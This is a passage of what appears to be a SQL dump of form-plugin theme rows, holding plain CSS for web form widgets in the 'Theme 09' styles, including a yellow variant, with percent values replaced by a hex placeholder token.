none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #DDDDDD;\r\nborder: 1px solid #818181;\r\nmargin-bottom: 10px;\r\ncolor: #818181;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-spinner-button\r\n{\r\nborder-radius:0px !important;\r\nbackground: none!important;\r\n}\r\n\r\na.ui-slider-handle {\r\nwidth: 13px;\r\nheight: 13px;\r\ntop: -4px;\r\nborder: 0px;\r\nborder-radius: 13px;\r\nbackground: #FAFAFA;\r\nborder: 3px solid #B1B1B1;\r\noutline: none;\r\n}\r\n\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F5F5F5 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #000;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\n\r\n\r\n.ui-slider-range {\r\n	background: #8A8A8A !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\nborder-top: 1px solid #7F7F7F !important;\r\n\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F8F8F8;\r\n	border: 1px solid #B7B7B7;\r\n	background-position: right 2px center;\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/09/01.png) 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/09/01/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background: url([SITE_ROOT]/images/09/next.png) no-repeat right;\r\n	padding: 0px 36px 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n        border: 1px solid #CECECE;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	background: url([SITE_ROOT]/images/09/previous.png) no-repeat left;\r\n	padding: 0 20px 0 36px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border: 1px solid #CECECE;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #013D7C;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n		border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: #DDDDDD;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\npadding:10px;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n\r\n}\r\n.wdform_section_break2 {\r\n	color: #013D7C;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 23px;\r\nmargin: 16px 10px 40px 0px;\r\n\r\n}\r\n\r\n.wdform_section_break {\r\n	color: #013D7C;\r\n	font-size: 23px;\r\nmargin: 16px 0px;\r\n\r\n}\r\n\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 24px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nbackground: #F8F8F8;\r\nborder: 1px solid #B7B7B7;\r\n	outline: none;\r\n}\r\ninput[type=\"text\"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type=\"password\"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type=\"text\"]:focus{\r\n	outline: none;\r\n}\r\ninput[type=\"password\"]:focus{\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #8B8B8B;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\ncursor: pointer;\r\n-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\nfilter: alpha(opacity=0);\r\nopacity: 0;\r\ncontent: \"\";\r\nposition: absolute;\r\nwidth: 13px;\r\nheight: 9px;\r\nbackground: url([SITE_ROOT]/images/09/checkbox.png) no-repeat;\r\nborder-radius: 0px;\r\ntop: 1px;\r\nleft: 2px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #8B8B8B;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \"\";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #8B8B8B;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\ncolor: #808080;\r\nbackground-color: #E5E5E5;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 27px;\r\ntext-align: center;\r\nvertical-align: bottom;\r\npadding: 5px 25px 0px 25px;\r\nfont-size: 18px;\r\nmargin-left:3px;\r\nmargin-bottom:2px;\r\n}\r\n.page_active {\r\n	color: #C2C2C2;\r\ncursor: pointer;\r\nbackground-color: #FFFFFF;\r\ndisplay: inline-block;\r\nvertical-align: bottom;\r\nheight: 29px;\r\ntext-align: center;\r\nfont-size: 22px;\r\npadding: 5px 25px 0px 25px;\r\nborder: 1px solid #7F7F7F;\r\nmargin-left:3px;\r\nmargin-bottom: -1px;\r\nborder-bottom: none;\r\nline-height: 26px;\r\n}\r\n.page_percentage_active {\r\npadding: 0px;\r\nborder-spacing: 0px;\r\nheight: 10px;\r\nbackground: #727272;\r\nfloat: left;\r\n}\r\n.page_percentage_deactive {\r\nheight: 10px;\r\nline-height: 20px;\r\nbackground-color: #E5E5E5;\r\ntext-align: left !important;\r\nmargin-bottom: 2px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n}\r\n\r\n.wdform_percentage_text {\r\ncolor: #fff;\r\nfont-size: 12px;\r\nposition: relative;\r\nbackground: url([SITE_ROOT]/images/09/01/02.png) no-repeat;\r\nwidth: 36px;\r\ndisplay: inline-block;\r\nheight: 36px;\r\ntop: -37px;\r\nleft: 17px;\r\ntext-align: center;\r\nline-height: 27px;\r\nfloat: right;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}',0),(32,'Theme 09 yellow','.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #DDDDDD;\r\nborder: 1px solid #E9B500;\r\nmargin-bottom: 10px;\r\ncolor: #E9B500;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-spinner-button\r\n{\r\nborder-radius:0px !important;\r\nbackground: none!important;\r\n}\r\n\r\na.ui-slider-handle {\r\nwidth: 13px;\r\nheight: 13px;\r\ntop: -4px;\r\nborder: 0px;\r\nborder-radius: 13px;\r\nbackground: #FAFAFA;\r\nborder: 3px solid #B1B1B1;\r\noutline: none;\r\n}\r\n\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F5F5F5 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #000;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\n\r\n\r\n.ui-slider-range {\r\n	background: #E9B500 !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\nborder-top: 1px solid #7F7F7F !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F8F8F8;\r\n	border: 1px solid #B7B7B7;\r\n	background-position: right 2px center;\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/09/01.png) 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/09/02/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background: url([SITE_ROOT]/images/09/next.png) no-repeat right;\r\n	padding: 0px 36px 0  20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n        border: 1px solid #CECECE;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	background: url([SITE_ROOT]/images/09/previous.png) no-repeat left;\r\n	padding: 0 20px 0 36px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border: 1px solid #CECECE;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #E9B500;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n		border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: #DDDDDD;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\npadding:10px;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_section_break2 {\r\n	color: #013D7C;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 23px;\r\nmargin: 16px 10px 5px 0px;\r\n}\r\n\r\n.wdform_section_break {\r\n	color: #E9B500;\r\n	font-size: 23px;\r\nmargin: 16px 0px;\r\n\r\n}\r\n\r\n.wdform-section-break-div\r\n{\r\nborder-top:1px solid #7F7F7F !important;\r\n}\r\n\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 24px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nbackground: #F8F8F8;\r\nborder: 1px solid #B7B7B7;\r\n	outline: none;\r\n}\r\ninput[type=\"text\"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type=\"password\"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type=\"text\"]:focus{\r\n	outline: none;\r\n}\r\ninput[type=\"password\"]:focus{\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #8B8B8B;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\ncursor: pointer;\r\n-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\nfilter: alpha(opacity=0);\r\nopacity: 0;\r\ncontent: \"\";\r\nposition: absolute;\r\nwidth: 13px;\r\nheight: 9px;\r\nbackground: url([SITE_ROOT]/images/09/checkbox.png) no-repeat;\r\nborder-radius: 0px;\r\ntop: 1px;\r\nleft: 2px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: 